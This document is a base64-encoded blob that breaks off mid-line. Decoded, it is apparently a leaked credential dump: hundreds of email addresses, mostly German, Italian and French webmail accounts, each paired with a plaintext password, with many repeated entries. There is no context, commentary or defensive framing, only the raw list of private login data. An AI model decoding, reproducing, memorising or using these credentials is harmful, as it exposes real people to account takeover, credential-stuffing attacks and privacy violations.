Z2VyQGhvdG1haWwuY29tOmFrc2FyYXk2OA0KS3JpZWdib3k6cTEucTEuDQpoLnNuLjY4QGhvdG1h aWwuY29tOnExLnExLg0KYWxpLnVlbGdlckBob3RtYWlsLmNvbTpxMS5xMS4NCmFsaS51ZWxnZXJA aG90bWFpbC5jb206aD8/c2V5aW4NCmguc24uNjgwOUBob3RtYWlsLmNvbTpxMS5xMS4NCmguc24u NjgwOUBob3RtYWlsLmNvbTpxMS5xMS4NCmguc24uNjgwOUBob3RtYWlsLmNvbTpxMS5xMS4NCmgu c24uNjhAaG90bWFpbC5jb206cTEucTEuDQpoLnNuLjY4MDlAaG90bWFpbC5jb206cTEucTEuDQps ZW5hLnRpZWR0a2VAZnJlZW5ldC5kZTo5a2hNNW4NCmxlbmEtcGVuYS1sZW5pLXBlbmlAaG90bWFp bC5kZTo5a2hNNW4NCkxlbmFfRXhhbXBsZUB3ZWIuZGU6OWtoTTVuDQpsZW5hLnRpZWR0a2VAd2Vi LmRlOjlraE01bg0KbGVuYXRpZWR0a2VAZnJlZW5ldC5kZTpzaWx2ZXJjaXJjbGUNCmNocmlzdGlh bkBzY2hvbHotaS5kZTppaXlhbWE2MzcyDQpjaHJpc3RpYW5Ac2Nob2x6LWkuZGU6Z29sZjYzNzIN CmRvbWVuaWMuc2Nob2x6aUBob3RtYWlsLmRlOkJyYW5kMTU2DQpob25leS1tb29uM0Bob3RtYWls LmRlOm1hbWFwYXBhDQpob25leS1tb29uM0Bob3RtYWlsLmRlOm1hbWFwYXBhDQpkZXRsZWZjemli b3JyYUBob3RtYWlsLmRlOm1hbWFwYXBhDQpGb2N1czE5QFdlYi5kZTptZWdhc2FmYXJpMTAxMjAz DQpnX2V4aXN0MTRAaG90bWFpbC5kZVwwOlJvbmFsZG83DQpSb25hbGRvNzoyMDEyLTA3LTE1VDEz OjQzOjMwWlwwDQpsb3R0YTk0QGhvdG1haWwuZGU6bmlja3d3dw0KbG90dGE5NEBob3RtYWlsLmRl OmJ1dHRlcmJsdW1lDQpsb3R0YTk0QGhvdG1haWwuZGU6aGFsbG8xMTENCmxvdHRhOTRAaG90bWFp bC5kZTpuaWNrd3d3DQpmbG9yaWFuLnBvcnRtYW5uQGdteC5jaDp6aXBmZWwNCmtlbmFuLXVjYXJA aG90bWFpbC5kZVwwOmthbGFuNjINCmZhYmlhbi1mYWhsZUB3ZWIuZGU6cHNlbm92YQ0KZmFiaWFu LWZhaGxlQHdlYi5kZTpwc2Vub3ZhDQp3ZXNzYWxjbGFzc2ljQGhvdG1haWwuZGU6bWFub21hbg0K d2Vzc2FsY2xhc3NpY0Bob3RtYWlsLmRlOm1hbm9tYW4NCnRhaHNzaW5faEBob3RtYWlsLmRlOm1h bm9tYW4NCndlc3NhbGNsYXNzaWNAaG90bWFpbC5kZTptYW5vbWFuDQplZGR5LmxsMzVAaG90bWFp bC5kZTp0aXR6aWFuDQplYXN5b25saW5lY2FzaDoxN0FwcmlsMTk5Ng0KYXF1aXRhbmluQGhvdG1h aWwuY29tOnB1dGFuYXphDQphcXVpdGFuaW5AaG90bWFpbC5jb206cHV0YW5hemENCnNjaHVtbGkt MTVAaG90bWFpbC5kZTpzY2hsb3Nzc2Nod2FuZW4xDQpzY2h1bWxpLTE1QGhvdG1haWwuZGU6c2No bG9zc3NjaHdhbmVuMQ0Kc2NodW1saS0xNUBob3RtYWlsLmRlOnNjaGxvc3NzY2h3YW5lbjENCmZh Y2Vib29rdW1mcmFnZW46b3NjYXIxDQpmYWNlYm9va3VtZnJhZ2VuOm9zY2FyMQ0KbWlub3ZhdGVA Z214LmRlOk5pY29sYXVzNg0KbWlub3ZhdGVAZ214LmRlOk5pY29sYXVzNg0KbWlub3ZhdGVAZ214 LmRlOk5pY29sYXVzNg0Ka3VzLWt1QHQtb25saW5lLmRlOmVtZWxpMjAwMw0Kc2ltb245OS10aGFp QGdteC5hdFwwOnNhdGEzMjENCi5jb206MDc5OTA5MTcxMg0KYWhtYWQucmFzb29samFuOi0vOjso KQ0KZWJiZTA0NjdAZ21haWwuY29tOmRidDM0ZG10DQplYmJlMDQ2N0BnbWFpbC5jb206ZGJ0MzRk bXQNCmViYmViYWNrQGdtYWlsLmNvbTpkYnQzNGRtdA0KZWJiZWJhY2tAZ21haWwuY29tOmRidDM0 ZG10DQplYmJlYmFja0BnbWFpbC5jb206ZGJ0MzRkbXQNCmplbnMuaG9ydC4zM0BmYWNlYm9vay5j b206ZWJiZTEyMzQNCnB4b3hrZXIuYnhveHkuMUBmYWNlYm9vay5jb206ZWJiZTEyMzQNCmplbnNl bmViYmU1QGdtYWlsLmNvbTpkYnQzNGRtdA0KZWJiZTA0NjdAZ21haWwuY29tOmRidDM0ZG10DQpq b2huZS5kZW5uaXNAeWFob28uZGU6KioqKioqDQpqb2huZS5kZW5uaXNAeWFob28uZGU6YWExMWFh DQpqb2huZS5kZW5uaXNAeWFob28uZGU6KioqKioqDQphbmlsXzA3QGxpdmUuYXQ6bWF0cml4NDY5 NDYNCmFuaWxfMDdAbGl2ZS5hdDptYXRyaXg0Njk0Ng0KX3NjaHVieV9Ad2ViLmRlOm1hc3Rlcg0K ZXNlci5tYXltdW5AeWFob28uY29tOmVzZXJlc2VyMjEzDQpzaWRvMjEzQGxpdmUuZGU6ZXNlcmVz ZXIyMTMNCmVzZXIubWF5bXVuQHlhaG9vLmNvbTptYXl1bTIxMw0Kc2lkbzIxM0BsaXZlLmRlOmVz ZXIyMTMNCmtyYW5rZnVydF9mZmJAaG90bWFpbC5kZTpmcmFua2Z1cnQ5Mw0Ka3JhbmtmdXJ0X2Zm YkBob3RtYWlsLmRlOmZyYW5rZnVydDkzDQpqYW5pbmFfZmVhdF9qZXNzaWNhQGhvdG1haWwuZGU6 QjFhMnIzdDQNCmphbmluYV9mZWF0X2plc3NpY2FAaG90bWFpbC5kZTpCMWEycjN0NA0KamFuaW5h X2ZlYXRfamVzc2ljYUBob3RtYWlsLmRlOkIxaTJ6M3o0bDUNCmtldmluMTAxQGhvdG1haWwuZGU6 cHlyQW1pZGU3NjUNCmtldmluMTAxQGhvdG1haWwuZGU6cHlyQW1pZGU3NjUNCmphbmluYV9GZWF0 X2plc3NpY2FAaG90bWFpbC5kZTpzZGRhd2FkDQptb18wNjljaGlsbGFoQGhvdG1haWwuZGU6YmF1 bXNjaHVsZQ0KYTQ2OTY4ODlAbmVwd2suY29tOnNvbW1lcjEyMw0KanVzdGluLnBldHJpQGhvdG1h aWwuZGU6c29tbWVyMTIzDQpidWZmb25maXNjaEB5YWhvby5kZTpmbGllZ2UxMjM0DQpqYW5pbmFf ZmVhdF9qZXNzaWNhQGhvdG1haWwuZGU6QjFpMnozejRsNQ0KamFuaW5hX2ZlYXRfamVzc2ljYUBo b3RtYWlsLmRlOkIxaTJ6M3o0bDUNCmphbmluYV9mZWF0X2plc3NpY2FAaG90bWFpbC5kZTpCMWEy cjN0NA0KamFuaW5hX2ZlYXRfamVzc2ljYUBob3RtYWlsLmRlOkIxYTJyM3Q0DQpqYW5pbmFfZmVh dF9qZXNzaWNhQGhvdG1haWwuZGU6QjFhMnIzdDQNCm1vXzA2OWNoaWxsYWhAaG90bWFpbC5kZTpi YXVtc2NodWxlDQptb18wNjljaGlsbGFoQGhvdG1haWwuZGU6YmF1bXNjaHVsZQ0KbW9fMDY5Y2hp bGxhaEBob3RtYWlsLmRlOmJhdW1zY2h1bGUNCmtldmluMTAxQGhvdG1haWwuZGU6cHlyQU1JREU3 NjUNCmplc3NpY2FfZmVhdF9qYW5pbmFAaG90bWFpbC5kZTpCMWEycjN0NA0KamVzc2ljYV9mZWF0 X2phbmluYUBob3RtYWlsLmRlOkIxMWEyYXJycjMzdHQ0DQpqYW5pbmFfRmVhdF9qZXNzaWNhQGhv dG1haWwuZGU6QjFhMnIzdDQNCm1vXzA2OWNoaWxsYWhAaG90bWFpbC5kZTpiYXVtc2NodWxlDQpr ZXZpbjEwMUBob3RtYWlsLmRlOnB5ckFtaWRlNzY1DQpqYW5pbmFfRmVhdF9qZXNzaWNhQGhvdG1h aWwuZGU6QjFhMnIzdDQNCmtyYW5rZnVydF9mZmJAaG90bWFpbC5kZTpmcmFua2Z1cnQ5Mw0KbWFz c2ltby5wZXJuYUB3ZWIuZGU6bHVjYS0xMg0KY3JvX3N0YXlsXzEwXzk2QGhvdG1haWwuY29tOmp1 Z28xMA0KamFyYW5fMTBAaG90bWFpbC5jb206ZWRoYXJkeQ0KanVnby45NkBob3RtYWlsLmNvbTpl ZGhhcmR5DQprcm8tbWFya292aWNAaG90bWFpbC5kZTplZGhhcmR5DQpuaWtvbGFfOTZfMTBAaG90 bWFpbC5jb206aWNoYmluY29vbA0KYW5hYmVsLW1hcmtvdmljQGhvdG1haWwuY29tOmFuYTE5OTYN CmNyb19zdGF5bF8xMF85NkBob3RtYWlsLmRlOmp1Z28xMA0Kc3BpZWxfM0Bob3RtYWlsLmNvbTpl ZGhhcmR5DQptYXJrb3ZpYy45NkBob3RtYWlsLmNvbTpiYWxrYW4NCmFiYWJlbC1tYXJrb3ZpY0Bo b3RtYWlsLmNvbTphbmExOTk2DQpib25uZS5jaGFuY2U5NkBob3RtYWlsLmNvbTpqdWdvMTANCmJv bm5lLmNoYW5jZTk2QGhvdG1haWwuY29tOmp1Z28xMA0Kc3BpZWw1MEBob3RtYWlsLmNvbTplZGhh cmR5DQpzcGllbF8xQGhvdG1haWwuY29tOmVkaGFyZHkNCnNwaWVsXzUwMEBob3RtYWlsLmNvbTpl ZGhhcmR5DQpzcGllbF8zMDBAaG90bWFpbC5jb206ZWRoYXJkeQ0Kc3BpZWxfMThAaG90bWFpbC5k ZTplZGhhcmR5DQptYXJrb19oc3ZAaG90bWFpbC5jb206bWFya28zMg0KanVnby45NkBob3RtYWls LmNvbTplZGhhcmR5DQpjcm9fc3RheWxfMTBfOTZAaG90bWFpbC5jb206bWFya292aWMxMA0Ka3Jv LW1hcmtvdmljQGhvdG1haWwuZGU6ZWRoYXJkeQ0KY3JvX3N0YXlsXzEwXzk2QGhvdG1haWwuY29t Omp1Z28xMA0KcG9rZXItZmFjYTIwMTFAaG90bWFpbC5jb206ZWRoYXJkeTEwDQpzcGllbF8zMDcy QGhvdG1haWwuY29tOmVkaGFyZHkxMA0Kc3BpZWxfMzA3MkBob3RtYWlsLmNvbTplZGhhcmR5MTAN Cm1hcmtvdmljX2hyQGhvdG1haWwuY29tOmp1Z28xMA0KYW50b18zMDE4QGhvdG1haWwuY29tOm1h anN0b3JfMzAxOA0KcG9rZXJfZmF6YUBob3RtYWlsLmNvbTplZGhhcmR5MVwnDQpwb2tlcl9mYXph QGhvdG1haWwuY29tOmVkaGFyZHkxMA0KbGl2ZV9oZEBsaXZlLmRlOmVkaGFyZHkxMA0Kc3BpZWxf NzlAaG90bWFpbC5jb206ZWRoYXJkeTEwDQptaXNzX2Nyb2F0aWEwOUBob3RtYWlsLmNvbToxMC4w NC4yMDExPDMNCm1pc3NfY3JvYXRpYTA5QGhvdG1haWwuY29tOjEyMzQ1Njc4OXgNCnRvbmkubWFy a292aWNockBob3RtYWlsLmNvbToxMjM0NTY3ODl4DQpyb2xleF9ibGFja0Bob3RtYWlsLmNvbTpl ZGhhcmR5MTANCnNwaWVsXzE3QGhvdG1haWwuY29tOmVkaGFyZHkNCmNyb19zdGF5bF8xMF85NkBo b3RtYWlsLmNvbTpqdWdvMTANCmp1Z28uOTZAaG90bWFpbC5jb206ZWRoYXJkeQ0KY3JvX3N0YXls XzEwXzk2QGhvdG1haWwuY29tOmp1Z28xMA0KY3JvX3N0YXlsXzEwXzk2QGhvdG1haWwuY29tOmp1 Z28xMA0KYm9ubi5jaGFuY2VAaG90bWFpbC5jb206YmFsa2FuMTANCmJvbm4uY2hhbmNlQGhvdG1h aWwuY29tOmJhbGthbjEwDQpzcGllbF8xNTBAaG90bWFpbC5jb206ZWRoYXJkeQ0Kc3BpZWxfMkBo b3RtYWlsLmNvbTplZGhhcmR5DQpzcGllbF8yQGhvdG1haWwuY29tOmVkaGFyZHkNCnNwaWVsXzJA aG90bWFpbC5jb206ZWRoYXJkeQ0KbWFya292aWMuOTZAaG90bWFpbC5jb206YmFsa2FuDQp5YXNp bmF0YXM1QGhvdG1haWwuZGU6U2FpdDEyKioNCkRpZS1EYW5ueUBob3RtYWlsLmRlOlJhbmllcm8N CkRlbHV4eGVEYW5ueUBmcmVlbmV0LmRlOlNjYXJsZXR0MDgwOQ0KdXdlLmdyZWdvckBnbXguZGU6 c2NoYWxrZTE5MDQNCnNjYXJsZXR0MjAwMC0wODA5QGhvdG1haWwuZGU6c2NhcmxldHQNCmRpZS1k YW5ueUBob3RtYWlsLmRlOlJhbmllcm8NCmRpZS1kYW5ueUBob3RtYWlsLmRlOnJhbmllcm8NCmVu ZXNhbGk5OEBsaXZlLmRlOjc4NDUxMjBlbmVzODk1NjIzMGFsaQ0KZW5lc2FsaTk4QGxpdmUuZGU6 Nzg0NTEyMGVuZXM4OTU2MjMwYWxpDQp3aWxrb2hlbG1lcnNAZ214LmRlOmR1bW1la2luZGVyDQp0 dWRhZXZuQG1haWwucnU6dXN0YXoyMDAyLmNvbQ0KdHVkYWV2bkBtYWlsLnJ1OnVzdGF6MjAwMi5j cG0NCnBva2Vtb25AbWFpbC5ydTp1c3RhejIwMDINCnR1ZGFldkBtYWlsLnJ1OnVzdGF6MjAwMi5j b20NCmRhcmt5d2lAbXNuLmNvbTpyYWluZXIyMDENCmRhcmt5d2lAbXNuLmNvbTpyYWluZXIyMDEN CmRhcmt5d2lAbXNuLmNvbTpyYWluZXIyMDENCmRhcmt5d2lAbXNuLmNvbTpyYWluZXIyMDENCmIt Ym95MjAxMUBsaXZlLmF0OnBvcHBpbmcxMjMNCmItYm95MjAxMUBsaXZlLmF0OnBvcHBpbmcxMjMN CmItYm95MjAxMUBsaXZlLmF0OnBvcHBpbmcxMjMNCmZsb3JpYW5zcGFuaWVyQHdlYi5kZTpBbjEy MzQ1DQpEYXJrLk9yYml0Ljg4QHdlYi5kZTpyZW1peDU0Ng0KaGFycnkucG90dGVyMDFAaG90bWFp bC5pdDpzaWx2aWENCmhhcnJ5LnBvdHRlcjAxQGhvdG1haWwuaXQ6cGlwcG9iYXVkbw0Kci1haG9f YWExOEBob3RtYWlsLmNvbTppem1pcjM1DQp5YW5uaWNrX3Jvb3NAaG90bWFpbC5jb206MTIzNDU2 Nzg5eTEyMzQ1Njc4OXkNCnlhbm5pY2tfcm9vc0Bob3RtYWlsLmNvbToxMjM0NTY3ODl5DQpraW5n QGhhYmJvcG9zdC5jb206amFrb2IxDQptb250aHkubWlhdUB3ZWIuZGU6TW9udGh5MDA3DQpjaHIu bWljOThAd2ViLmRlOnhlcnhlczEyDQpkdWN5bXVjeUB5YWhvby5kZTpmNHRxZ25sDQp1bmNoYXRl ZDVAeWFob28uZGU6ZGFzZGFzDQpkdXhtdXhAeWFob28uZGU6ZjR0cWdubA0Kam9uYWgua2xlcmt4 b3hAd2ViLmRlOndlcmRlcmJyZW1lbjEwDQpqb25haC5rbGVya3hveEB3ZWIuZGU6V2VyZGVyYnJl bWVuMTANCmpvbmFoLmtsZXJreG94QHdlYi5kZTpXZXJkZXJicmVtZW4xMA0KY29sMTJAZ214LmRl OjU5MzE5NTFiDQp5LmhvbGxhbmRAd2ViLmRlOk11aGt1aA0KaGFiYm9nZWxkcmVpc0BsaXZlLmRl OktrMjAwNjk5DQpoYWJib2dlbGRyZWlzQGxpdmUuZGU6S2todWh1aHUNCmVpY2JlbEBhcmNvci5k ZTp2ZXJkYW1tdA0KZWljaGJhdW05MEB5YWhvby5kZTpibGVpc3RpZnQxDQphZ3VhbnRlX3JpdmVy X3BsYXRlXzIwMDdAaG90bWFpbC5jb21cMDpzYW5hbXVlcnRlDQphZ3VhbnRlX3JpdmVyX3BsYXRl XzIwMDdAaG90bWFpbC5jb206c2FuYW11ZXJ0ZQ0KcnViZW4tcm9uYWxkb0Bob3RtYWlsLmRlOnBv cnR1Z2FsDQpSdW5uZXJhbmRDbGltYmVyQGdtYWlsLmNvbTptYXN0ZXIxMTENCm1heGFsYWRvd0Bn bWFpbC5jb206MTIzNDU2Nzg5DQptYXhhbGFkb3dAZ21haWwuY29tOjEyMzQ1Njc4OQ0KS25hbGxl cjA0QHlhaG9vLmRlOktuYWxsZXIwNA0KZGFueTU5QGhvdG1haWwuY29tOnVubzEyMw0KZGFuNTlA aG90bWFpbC5jb206bnkgb2xpdmVpcmENCmRhbnk1OUBob3RtYWlsLmNvbTp1bm8xMjMNCmx5aWxt YXpAaG90bWFpbC5kZTpCRVlaQTIwMDQNCmx5aWxtYXpAaG90bWFpbC5kZTpCRVlaQTIwMDQNCmx5 aWxtYXpAaG90bWFpbC5kZTpCRVlaQTIwMDQNCmIteWlsbWF6LTUwQGhvdG1haWwuZGU6QmF5cmFt MTk5OQ0Ka2F0aWFfYmFjaGFAaG90bWFpbC5jb206a2F0aWEwMTA1NzkNCmthdGlhX2JhY2hhQGhv dG1haWwuY29tOmthdGlhMDEwNTc5DQprYXRpYV9iYWNoYUBob3RtYWlsLmNvbTprYXRpYTAxMDU3 OQ0KZGVtaGF0YWZzaW5AaG90bWFpbC5kZVwwOmRlbWhhdDEyMw0KZmVyaGF0MTIzOjIwMTItMDct MzBUMDg6NDU6MjdaXDANCm5pY28uZ2lsbGljaEBldXJvLXNhdC5kZTpuaWNvZ2VpbA0KY2F0cmlu LmdpbGxpY2hAZXVyby1zYXQuZGU6VHJ1bGxpMTMNCm5pY28uZ2lsbGljaEBldXJvLXNhdC5kZTpt b2lubmljbw0Kbmljby5naWxsaWNoQGV1cm8tc2F0LmRlOm1vaW5uaWNvDQpGdXNzZWwtSGFiYm9A aG90bWFpbC5kZTpIYWxsbzENCm1hcmNlbDE0LjA3QGhvdG1haWwuZGU6SGFsbG8xDQpTbW9raW5n IEpvZTptYWlkZW4NCkpvZXk6bWFpZGVuDQpoYXJ1bi5jYW1pY2lAbGl2ZS5kZTppem1pcjM1DQpj aGFudGljcmFtZXJAd2ViLmRlOlNjaG9rb2tla3MxMw0KY2hhbnRpY3JhbWVyQHdlYi5kZTpTY2hv a29rZWtzMTMNCm5pY28uZ2lsbGljaEBldXJvLXNhdC5kZTpuaWNvZ2VpbA0Kbmljby5naWxsaWNo QGV1cm8tc2F0LmRlOm5pY29nZWlsDQphbmdlbG8uZXVzdGFjY2hpQGhvdG1haWwuaXQ6TUFSQ084 OA0KYW5nZWxvLmV1c3RhY2NoaUBob3RtYWlsLml0Onplcm85OQ0KYW5nZWxvLmV1c3RhY2NoaUBo b3RtYWlsLml0Onplcm85OQ0KYW5nZWxvLmV1c3RhY2NoaUBob3RtYWlsLml0Onplcm85OQ0KYW5n ZWxvLmV1c3RhY2NoaUBob3RtYWlsLml0Om1hcmNvODgNCmFuZ2Vsby5ldXN0YWNjaGlAaG90bWFp bC5pdDptYXJjbzg4DQpyb2d5bWFzdGVyQGhvdG1haWwuZGU6cm9neTYwMA0KeWFzaS1waXBzaUBo b3RtYWlsLmRlOmhhbGxvbQ0KeGRoYXNhbjEyM0Bob3RtYWlsLmRlOjAyMjAzNDk0OA0KYXJ0dXJ1 c3Rpbm92QGhvdG1haWwuZGU6Z2FsaW5hODgNCmFydHVydXN0aW5vdkBob3RtYWlsLmRlOmdhbGlu YTg4DQptYXJpYWRld2V3amVAeWFuZGV4LnJ1OjIxMDcxOTc4DQpjYXJvdW5lZnJAeWFob28uZnI6 Y2FyaW5lMTk3OQ0KdGhvbWFzLmJvdXJnZW9pc0Bob3RtYWlsLmZyOk1vcnRpemExMg0KanVqdS5i b3VtQGhvdG1haWwuZnI6Z3Jlbm91aWxsZQ0KbWFyaWVodW1ibGV0QHlhaG9vLmZyOmNsb2NoZXR0 ZQ0KRHJvcG94ZUBob3RtYWlsLmZyOm1vcnRpemExMg0KSGFiYm86bW9ydGl6YTEyDQpkcm9wb3hl ZWVlZUBob3RtYWlsLmZyOm1vcnRpemExMg0KZHJvcG94ZWVlZWVAaG90bWFpbC5mcjptb3J0aXph MTINCmlkZWFsIG51cmVkaW5pOm51cmVkaW5pMTk5MQ0KaWRlYWwgbnVyZWRpbmk6bnVyZWRpbmkx OTkxDQowMTUxNTQ5MDIyODk6TWF0dGhpYXMwNzA0OTkNCm1hdHRoaWFzLXNub29weUBnbXguZGU6 TWF0dGhpYXMwNzA0OTkNCmVtYWlsXDA6cGFzc1wwDQpsdWthc3RlcmxpY2hAeWFob28uZGVcMDpm Znd0aHVtDQpoYXBweS5mYW1pbHlAbGl2ZS5kZTpydWJpbjIwMDkNCnJhbWkuYWxrYWRpQGhvdG1h aWwuZGU6MTJoaXBob3ANCnBpZXJyZS40eW91QHdlYi5kZTptYXN0ZXIxMjMNCnAubW9semFobkB3 ZWIuZGU6c2luYW4xMjMNCnNpa2EuNHlvdUB3ZWIuZGU6c2luYW4xMjMNCmh1bmQuNHlvdUB3ZWIu ZGU6c2luYW4xMjMNCnBpZXJyZS40eW91QHdlYi5kZVwwOm1hc3RlcjEyMw0KMDc2NDU2NzA3NjpN YW1hbWlfXzMyMQ0Kc3R1cGlkdGVlbmFnZXJxdW90ZXNAZ21haWwuY29tXDA6TWFtYW1pMzIxDQpq YW5pay1lbHNuZXJAb25saW5lLmRlOmphbm5pMTIzbGVnZW5kDQp0cmF1bWJveXlAaG90bWFpbC5j b206aGFiYm8xMjMNCmxpbF9lbmVzX3N0eWxlQGhvdG1haWwuY29tOjU2OTg3NDEyMw0KdGhlLWJh bGthbi1ib3lAaG90bWFpbC5jb206Ym9yaXMyOGJvcmlzMjgNCmxpbF9lbmVzX3N0eWxlQGhvdG1h aWwuY29tOjU2OTg3NDEyMw0KaHViYm9lbmVlc0Bob3RtYWlsLmNoOkxvczEyMw0KaHViYm9lbmVl c0Bob3RtYWlsLmNoOkxvczEyMw0KaHViYm9lbmVlc0Bob3RtYWlsLmNoOkxvczEyMw0KYm95b21p ZEBsaXZlLmRlOklyYW5lcjEyMw0KaXN1bGlscEB3ZWIuZGU6SXN1bGlkcmFnb24NCklzdWxpTFBA d2ViLmRlOklzdWxpZHJhZ29uDQplZGhhcmR5MTJAYXJjb3IuZGU6ZG9ydG11bmQNClNhbmRyby1L YWxldHRAZ214LmRlOlNhbmRyb2xvbA0KU2FuZHJvLWthbGV0dEBnbXguZGU6S2FsZXR0MTk5OQ0K c2FuZHJvLUthbGV0dEBnbXguZGU6U2FuZHJvLUthbGV0dEBnbXguZGUNClNhbmRyby1rYWxldHRA Z214LmRlOlNhbmRyby1LYWxldHRAZ214LmRlDQplcmlrLnd1dGhlbm93QHdlYi5kZTpidmIwOTY1 NDMyMQ0Kc2FuZHJvLWthbGV0dEBnbXguZGU6U2FuZHJvbG9sDQpzYW5kcm8ta2FsZXR0QGdteC5k ZTpTYW5kcm9sb2wNCnJ1ZGktNTdAZ214LmRlOml3ZWd0byAxMw0KbWFya3VzcDAzQGhvdG1haWwu ZGU6S2luZ2tvbmcxMjMNCnZhbmVzc2Fib2NoZUBob3RtYWlsLmRlOnZhbmVzc2FiMTIzDQptYXJr dXNwMDNAaG90bWFpbC5kZToxNDA4MTk5OQ0KbWFya3VzcDAzQGhvdG1haWwuZGU6bWljaGFlbGEx MjMNCnNsYWRhcEBob3RtYWlsLmRlOm1pbWkxMg0KbWFya3VzcDAzQGhvdG1haWwuZGU6bWluZWNy YWZ0DQptYXJrdXNwMDNAaG90bWFpbC5kZTpLaW5na29uZzEyMw0KbWFya3VzcDAzQGhvdG1haWwu Y29tOm1pbmVjcmFmdA0KbWFya3VzcDAzQGhvdG1haWwuY29tOm1pbmVjcmFmdA0KbWFya3VzcDAz QGhvdG1haWwuZGU6MTQwODE5OTkNCnNsYWRhbmFzQGhvdG1haWwuZGU6bWljaGFlbGExMjMNCm1h cmt1c3AwM0Bob3RtYWlsLmRlOm1pbmVjcmFmdA0Kc2xhZGFuYXBAaG90bWFpbC5kZTptYXJrdXNw MTIzDQpqdWxpYW43MkBsaXZlLmRlOnNpbXNvbnMuMzQNCnQtc2lldmVyc0Bvc25hbmV0LmRlXDA6 bWl0bWl0Mg0KeGxlcjEzNEBob3RtYWlsLmRlOmNpY2EzOQ0KYmlrZXJib3kyMDAwMkB3ZWIuZGU6 aTE5OTkxMDAzbg0KdGFyaWtib3kxMjM6b251cnNhaGlubTEyMw0KYXV4YnVyZ3N0eWxlcjExQGhv dG1haWwuY29tOnNhbXVlbDEyMw0KZWR3YXJkd2FtYm9sdEB3ZWIuZGU6bWVpc3RlcmExOTgzDQpt dWdsZTEyOmphY2sxMjEyDQpqYWNrLW5vYWhAaG90bWFpbC5kZTpqYWNrMTIxMg0KamFjay1ub2Fo QGhvdG1haWwuZGVcMDpqYWNrMTIxMg0KY3Npa29yYWhhY2hlbUB5YWhvby5jb206TW9ub2hhdGEN Cmplc3NpY2FiYXJiaWVAYW9sLmNvbTphc2RmZ2hqa2zDtsOkDQpqYXNvbnNrb2syMDAxQGdtYWls LmNvbTpzb2xkaWVyNQ0KbWFyY28ubGV5Z3JhZjFAd2ViLmRlOmNvbXB1dGVyMjMNCmhhYmJvLnNs b3NoQHdlYi5kZTpqYW5pbmUyMQ0KZGpkb2JiYUB3ZWIuZGU6aGFtYnVyZzENCm1lbGkuYW5nZWxv MjAwMEBsaXZlLmRlOmFsdGVjbGFuc2luZw0KbWVsaS5hbmdlbG8yMDAwQGxpdmUuZGU6YmxlcnRh DQpjc2lrb3JhaGFjaGVtQHlhaG9vLmNvbTpNb25vaGF0YQ0Kc3BlY2h0LnJpY29AeWFob28uZGU6 bWFkZG9nMTIzDQpzcGVjaHQucmljb0B5YWhvby5kZTptYWRkb2cxMjMNCnJpa25pamRla2VuQGxp dmUubmw6bWlqbmRla2VuDQpyaWtuaWpkZWtlbkBsaXZlLm5sOm1pam5kZWtlbg0KcG9rZXBvcm46 cG9ybjAwMQ0Kc2V2aW4uY2ltQGxpdmUuZGU6cy5hLjM0NA0KYWtlbm55QHdlYi5kZTpBbGlzYTEy Mg0KYWtlbm55QHdlYi5kZTpBbGlzYTEyMg0KZ2VybWFuX3BsYXllcl8yMDEwQGhvdG1haWwuZGU6 Z2VybWFuMjAxMA0KYl9wcmlzaHRpbmFAaG90bWFpbC5jaDpoYWp2YWxpamENCmJwcmlzaHRpbmFA aG90bWFpbC5jb206aGFqdmFsaWphDQpiX3ByaXNodGluYUBob3RtYWlsLmNvbTpoYWp2YWxpamEN CkJ1ZGE6QlJJS0JPU1MxOTk5DQp3YWxlcmFpcmluYTIwMDdAbWFpbC5ydTpsZW9uaWVkYW5pZWxs ZW9uaWVkYW5pZWwNCmFsZXhhbmRlci5zYWxsbWFubkBnbXguYXQ6eGFuZGkyMDAwDQpmYWJpYW5f OTlAbGl2ZS5kZTpmYWJpYW5sYW5nZTE5OTkNClNha19Ob2VsQGhvdG1haWwuZGU6ZGVpbmVtdWRk YQ0KZmFiaWFuXzk5QGxpdmUuZGU6ZmFiaWFubGFuZ2UxOTk5DQpzYWtfbm9lbEBob3RtYWlsLmRl OmRlaW5lbXVkZGENCmZhYmlhbl85OUBsaXZlLmRlOmZhYmlhbmxhbmdlMTk5OQ0KU2FrX05vZWxA aG90bWFpbC5kZTpkZWluZW11ZGRhDQp3YXNpbTM2MUBob3RtYWlsLmRlOjAxNzZ2ZXJwaXNzZGlj aA0KbWF1c2NsaWNrOjAxNzZ2ZXJwaXNzZGljaA0KdXNhbWFfYWJheWFAaG90bWFpbC5jb206U2Fu Y2hleg0KdXNhbWFfYWJheWFAaG90bWFpbC5jb206U2FuY2hleg0KdXNhbWFfYWJheWFAaG90bWFp bC5jb206U2FuY2hleg0KdXNhbWFfYWJheWFAaG90bWFpbC5jb206U2FuY2hleg0KdXNhbWFfYWJh eWFAaG90bWFpbC5jb206U2FuY2hleg0KdXNhbWFfYWJheWFAaG90bWFpbC5jb206KioqKioqKioq Kg0KbHVjeWJvdEBob3RtYWlsLml0OlRPVE85OQ0KbHVjeWJvdDNAaG90bWFpbC5pdDp0b3RvOTkN CmZsb3JpYW5fYWxmaW5nQGhvdG1haWwuZGU6MTIzMTIzZmNoDQprdXJ0YWxhbl91bmFsYW5AaG90 bWFpbC5kZTprdXJ0YWxhbjEyMzQNCm1hZmlhLjc3QGhvdG1haWwuZGU6YWJjMTIzLC4tDQpzYW1p MDFAZ21haWwuaXQ6U2FtdWVsZTIwMDENCm9tZXJjYW40ODcyQGhvdG1haWwuY29tOm1lcmNhbi4N Cm9tZXJjYW40ODcyQGhvdG1haWwuY29tOm1lcmNhbi4NCmp1c3RpbnJ1c2NoQGxpdmUuZGU6SnVz dHVzMTk5OQ0KanVzdGlucnVzY2g3N0BnbWFpbC5jb206SnVzdHVzMjIwMw0KanVzdGlucnVzY2hA bGl2ZS5kZTpKdXN0dXMxOTk5DQpqb25hc3NjaHVsejNAd2ViLmRlOmRhZGE5NjkNCmlnb3IuYjE5 OTlAaG90bWFpbC5jb206SWdvcjE5OTkNCmlnb3IuYjE5OTlAaG90bWFpbC5jb206SWdvcjE5OTlo DQpib3Jpc2xhdkBob3RtYWlsLmNoOmRlZGF2bGFza2ENCmJvcmlzbGF2QGhvdG1haWwuY2g6ZGVk YXZsYXNrYQ0KYm9yaXNsYXZAaG90bWFpbC5jaDpkZWRhdmxhc2thDQpiYXRpc3RhXzEwMDBAaG90 bWFpbC5lczp5dGFzODk3DQp3YXJ6ZWNoYWZsb3JpYW5Acm9ja2V0bWFpbC5jb206ZmxvcmlhbjEz MzcNCmdhbGEtYXJzbGFuQGhvdG1haWwuZGU6Z3Vyc2VsDQpzaXZhc2xpX2Z1cmtpQGhvdG1haWwu 